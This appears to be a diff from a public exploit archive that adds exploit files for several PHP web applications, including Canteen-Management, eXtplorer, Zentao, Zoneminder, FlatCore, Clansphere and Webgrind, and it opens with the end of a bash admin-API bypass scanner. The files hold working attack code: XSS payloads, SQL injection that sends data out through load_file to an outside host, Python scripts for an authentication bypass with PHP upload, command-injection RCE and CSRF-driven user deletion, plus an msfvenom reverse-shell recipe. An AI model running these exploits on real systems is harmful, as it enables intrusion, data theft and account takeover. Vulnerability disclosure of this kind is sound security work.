-H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
if [ "$?" == "0" ];then
grep "results" ./$target.out >/dev/null
if [ "$?" == "0" ];then
echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
else
rm -f ./$target.out
echo -e "${red}Not Vulnerable ${end}"
fi
else
echo -e "${red}Not Vulnerable ${end}"
rm -f ./$target.out
fi
}
vuln

264
exploits/php/webapps/51062.txt Normal file
View file

@ -0,0 +1,264 @@
## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: Free PHP Projects & Ideas with Source Codes for Students |
mayurik <https://www.mayurik.com/>
## Software:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management
## Description:
The name of an arbitrarily supplied URL parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can craft a very malicious HTTPS URL redirecting to a very
malicious URL. When the victim clicks into this crafted URL the game will
over for him.
[+]Payload REQUEST:
```HTML
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22
https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106",
"Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
[+]Payload RESPONSE:
```burp
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8
<link rel="stylesheet" href="assets/css/popup_style.css">
<style>
.footer1 {
position: fixed;
bottom: 0;
width: 100%;
color: #5c4ac7;
text-align: center;
}
</style>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,
user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<link rel="icon" type="image/png" sizes="16x16"
href="assets/uploadImage/Logo/favicon.png">
<style type="text/css">
@media print {
#printbtn {
display : none;
}
}
</style>
<title>Youthappam Canteen Management System - by Mayuri K.
Freelancer</title>
<link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
<link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
<link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet"
/>
<link href="assets/css/lib/bootstrap/bootstrap.min.css"
rel="stylesheet">
<link href="assets/css/helper.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
<link rel="stylesheet"
href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
<link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
<link href="assets/css/lib/calendar2/pignose.calendar.min.css"
rel="stylesheet">
<link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
<link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"
rel="stylesheet">
<script type="text/javascript" src="
https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript">
google.charts.load("current", {packages:["corechart"]});
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var data = google.visualization.arrayToDataTable([
['Food', 'Average sale per Day'],
['Masala dosa', 11],
['Chicken 65 ', 2],
['Karapu Boondi', 2],
['Bellam Gavvalu', 2],
['Gummadikaya Vadiyalu', 7]
]);
var options = {
title: 'Food Average Sale per Day',
pieHole: 0.4,
};
var chart = new
google.visualization.PieChart(document.getElementById('donutchart'));
chart.draw(data, options);
}
</script>
</head>
<body class="fix-header fix-sidebar">
<div id="page"></div>
<div id="loading"></div>
<div id="main-wrapper">
<div class="unix-login">
<div class="container-fluid" style="background-image:
url('assets/myimages/background.jpg');
background-color: #ffffff;background-size:cover">
<div class="row">
<div class="col-lg-4 ml-auto">
<div class="login-content">
<div class="login-form">
<center><img
src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
<form
action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"
target="_blank" rel="noopener nofollow ugc"> <img src="https:/
raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"
method="post" id="loginForm">
<div class="form-group">
<input type="text" name="username"
id="username" class="form-control" placeholder="Username" required="">
</div>
<div class="form-group">
<input type="password"
id="password" name="password" class="form-control" placeholder="Password"
required="">
</div>
<button type="submit" name="login"
class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>
<!-- <div class="forgot-phone text-right
f-right">
<a href="#" class="text-right f-w-600"> Forgot Password?</a>
</div> -->
<div class="forgot-phone text-left f-left">
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development
Requirement&body = I saw your projects. I want to develop a project"
class="text-right f-w-600"> Click here to contact me</a>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="./assets/js/lib/jquery/jquery.min.js"></script>
<script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
<script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>
<script src="./assets/js/jquery.slimscroll.js"></script>
<script src="./assets/js/sidebarmenu.js"></script>
<script
src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>
<script src="./assets/js/custom.min.js"></script>
<script>
function onReady(callback) {
var intervalID = window.setInterval(checkReady, 1000);
function checkReady() {
if (document.getElementsByTagName('body')[0] !== undefined) {
window.clearInterval(intervalID);
callback.call(this);
}
}
}
function show(id, value) {
document.getElementById(id).style.display = value ? 'block' : 'none';
}
onReady(function () {
show('page', true);
show('loading', false);
});
</script>
</body>
</html>
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management
)
## Proof and Exploit:
[href](https://streamable.com/emg0zo)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

62
exploits/php/webapps/51063.txt Normal file
View file

@ -0,0 +1,62 @@
## Exploit Title: Canteen-Management v1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi
## Description:
The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)
## Proof and Exploit:
[href](https://streamable.com/vvz2lh)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

279
exploits/php/webapps/51067.txt Normal file
View file

@ -0,0 +1,279 @@
# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)
# Exploit Author: ErPaciocco
# Author Website: https://erpaciocco.github.io
# Vendor Homepage: https://extplorer.net/
#
# Vendor:
# ==============
# extplorer.net
#
# Product:
# ==================
# eXtplorer <= v2.1.14
#
# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
# directories, edit, copy, move, delete,
# search, upload and download files, create & extract archives, create new
# files and directories, change file
# permissions (chmod) and more. It is often used as FTP extension for popular
# applications like Joomla.
#
# Vulnerability Type:
# ======================
# Authentication Bypass (& Remote Command Execution)
#
#
# Vulnerability Details:
# =====================
#
# eXtplorer authentication mechanism allows an attacker
# to login into the Admin Panel without knowing the password
# of the victim, but only its username. This vector is exploited
# by not supplying password in POST request.
#
#
# Tested on Windows
#
#
# Reproduction steps:
# ==================
#
# 1) Navigate to Login Panel
# 2) Intercept authentication POST request to /index.php
# 3) Remove 'password' field
# 4) Send it and enjoy!
#
#
# Exploit code(s):
# ===============
#
# Run below PY script from CLI...
#
# [eXtplorer_auth_bypass.py]
#
# Proof Of Concept
try:
import requests
except:
print(f"ERROR: RUN: pip install requests")
exit()
import sys
import time
import urllib.parse
import re
import random
import string
import socket
import time
import base64
TARGET = None
WORDLIST = None
_BUILTIN_WL = [
'root',
'admin',
'test',
'guest',
'info',
'adm',
'user',
'administrator'
]
_HOST = None
_PATH = None
_SESSION = None
_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive' }
def detect():
global _HOST
global _PATH
global _SESSION
global _HEADERS
_HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]
_PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')
_SESSION = requests.Session()
raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)
if raw.status_code == 200:
ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE)
if int(ver[0][2]) < 15:
return True
return False
def auth_bypass():
global _HOST
global _PATH
global _SESSION
global _HEADERS
global WORDLIST
global _BUILTIN_WL
_HEADERS['X-Requested-With'] = 'XMLHttpRequest'
params = {'option': 'com_extplorer',
'action': 'login',
'type': 'extplorer',
'username': 'admin',
'lang':'english'}
if WORDLIST != None:
if WORDLIST == _BUILTIN_WL:
info(f"Attempting to guess an username from builtin wordlist")
wl = _BUILTIN_WL
else:
info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}")
with open(WORDLIST[0], "r") as f:
wl = f.read().split('\n')
for user in wl:
params = {'option': 'com_extplorer',
'action': 'login',
'type': 'extplorer',
'username': user,
'lang':'english'}
info(f"Trying with {user}")
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
if "successful" in res.text:
return (user)
else:
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
if "successful" in res.text:
return ('admin')
return False
def rce():
global _HOST
global _PATH
global _SESSION
global _HEADERS
global _PAYLOAD
tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js")
token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0]
info(f"CSRF Token obtained: {token}")
payload = editPayload()
info(f"Payload edited to fit local parameters")
params = {'option': 'com_extplorer',
'action': 'upload',
'dir': f"./{_PATH}",
'requestType': 'xmlhttprequest',
'confirm':'true',
'token': token}
name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
files = {'userfile[0]':(f"{name}.php", payload)}
req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)
if "successful" in req.text:
info(f"File {name}.php uploaded in root dir")
info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")
def attack():
if not TARGET:
error("TARGET needed")
if TARGET:
if not detect():
error("eXtplorer vulnerable instance not found!")
exit(1)
else:
info("eXtplorer endpoint is vulnerable!")
username = auth_bypass()
if username:
info("Auth bypassed!")
rce()
else:
error("Username 'admin' not found")
def error(message):
print(f"[E] {message}")
def info(message):
print(f"[I] {message}")
def editPayload():
# You can generate payload with msfvenom and paste below base64 encoded result
# msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64
return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")
def help():
print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution
Usage:
python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]
Options:
-t Target host. Provide target IP address (and optionally port).
-w Wordlist for user enumeration and authentication (Optional)
-wb Use built-in wordlist for user enumeration (Optional)
-h Show this help menu.
""")
return True
args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))),
"w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))),
"wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))),
"h" : (0, lambda *x: (help() and exit(0)))}
if __name__ == "__main__":
i = 1
[
args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ])
for arg in [k
for k in sys.argv[i:]
]
if arg[0] == '-'
]
attack()
else:
help()
# ///////////////////////////////////////////////////////////////////////
# [Script examples]
#
#
# c:\>python eXtplorer_auth_bypass.py -t https://target.com
# c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt
# c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb
# Exploitation Method:
# ======================
# Remote
# [+] Disclaimer
# The information contained within this advisory is supplied "as-is" with no
# warranties or guarantees of fitness of use or otherwise.
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and
# that due credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit
# is given to the author. The author is not responsible for any misuse of the
# information contained herein and accepts no responsibility
# for any damage caused by the use or misuse of this information.

14
exploits/php/webapps/51068.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://flatcore.org/
# Version: 2.1.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/install/index.php
2- Write XSS Payload into the username of the user account.
3- Press "Save" button.
XSS Payload ==> "<script>alert("usernameXSS")</script>

110
exploits/php/webapps/51069.txt Normal file
View file

@ -0,0 +1,110 @@
# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)
# Exploit Author: mister0xf
# Date: 2022-10-8
# Software Link: https://github.com/easysoft/zentaopms
# Version: tested on 17.0 (probably works also on newer/older versions)
# Tested On: Kali Linux 2022.2
# Exploit Tested Using: Python 3.10.4
# Vulnerability Description:
# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing
# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver
# Vulnerable Source Code:
# /module/repo/model.php:
# [...]
# $client = $this->post->client; // <-- client is taken from the POST request
# [...]
# elseif($scm == 'Git')
# {
# if(!is_dir($path))
# {
# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);
# return false;
# }
#
# if(!chdir($path))
# {
# if(!is_executable($path))
# {
# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);
# return false;
# }
# dao::$errors['path'] = $this->lang->repo->error->path;
# return false;
# }
#
# $command = "$client tag 2>&1"; // <-- command is injected here
# exec($command, $output, $result);
import requests,sys
import hashlib
from urllib.parse import urlparse
from bs4 import BeautifulSoup
def banner():
print('''
::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: ::::::::
:+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+
+#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
######### ########## ### #### ######## ########### ### ### ########
''')
def usage():
print('Usage: zenciao user password http://127.0.0.1/path')
def main():
if ((len(sys.argv)-1) != 3):
usage()
banner()
exit()
#proxy = {'http':'http://127.0.0.1:8080'}
banner()
username = sys.argv[1]
password = sys.argv[2]
target = sys.argv[3]
# initialize session object
session = requests.session()
home_url = target+'/index.php'
rand_url = target+'/index.php?m=user&f=refreshRandom&t=html'
login_url = target+'/index.php?m=user&f=login&t=html'
create_repo_url = target+'/index.php?m=repo&f=create&objectID=0'
r1 = session.get(home_url)
soup = BeautifulSoup(r1.text, "html.parser")
script_tag = soup.find('script')
redirect_url = script_tag.string.split("'")[1]
r2 = session.get(target+redirect_url)
# get random value
session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
res = session.get(rand_url)
rand = res.text
# compute md5(md5(password)+rand)
md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode())
# login request
post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""}
my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html'
session.headers.update({'Referer': my_referer})
session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
response = session.post(login_url, data=post_data)
# exploit rce
# devops repo page
r2 = session.get(create_repo_url)
git_test_dir = '/home/'
command = 'whoami;'
exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""}
r3 = session.post(create_repo_url, data=exploit_post_data)
print(r3.content)
if __name__ == '__main__':
main()

16
exploits/php/webapps/51070.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Sinem Şahin
# Date: 2022-10-08
# Vendor Homepage: https://www.csphere.eu/
# Version: 2011.4
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872
2- Write XSS Payload into the username of the buddy list create.
3- Press "Save" button.
XSS Payload ==> "<script>alert("usernameXSS")</script>
Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md

70
exploits/php/webapps/51071.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
# Date: 10/01/2022
# Exploit Author: Trenches of IT
# Vendor Homepage: https://github.com/ZoneMinder/zoneminder
# Version: v1.36.26
# Tested on: Linux/Windows
# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
#
# Proof of Concept:
# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
# 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log
# 3 - XSS executes delete function on target UID (user).
import requests
import re
import time
import argparse
import sys
def getOptions(args=sys.argv[1:]):
parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1")
parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True)
parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True)
parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True)
parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True)
parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True)
options = parser.parse_args(args)
return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>"
#Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password
loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"}
loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"}
response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)
zmHeaders = response.headers
try:
zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))
finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')
except:
print("[ERROR] Ensure the provided username and password is correct.")
sys.exit(1)
print("Collected the low privilege user session token: "+finalSession)
#Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter"
csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'}
csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"}
response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)
zmBody = response.text
extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))
finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')
print("Collected the CSRF key for the log injection request: "+finalCsrfKey)
print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)

45
exploits/php/webapps/51074.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://github.com/jokkedk/webgrind/
# Software Link : http://github.com/jokkedk/webgrind/
# Tested Version: 1.1
# Tested on: Windows 10 using XAMPP
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434
Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.
Proof of concept:
http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph
And the calc.exe opens.
Note: 0'&calc.exe&', & char is neccesary to execute the command.
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Webgrind v1.1 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,
in file parameter.
Proof of concept:
http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E
Response:
...
<title>
webgrind - fileviewer: </title><script>alert(1);</script><title> </title>
<script type="text/javascript" charset="utf-8">

75
exploits/php/webapps/51075.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
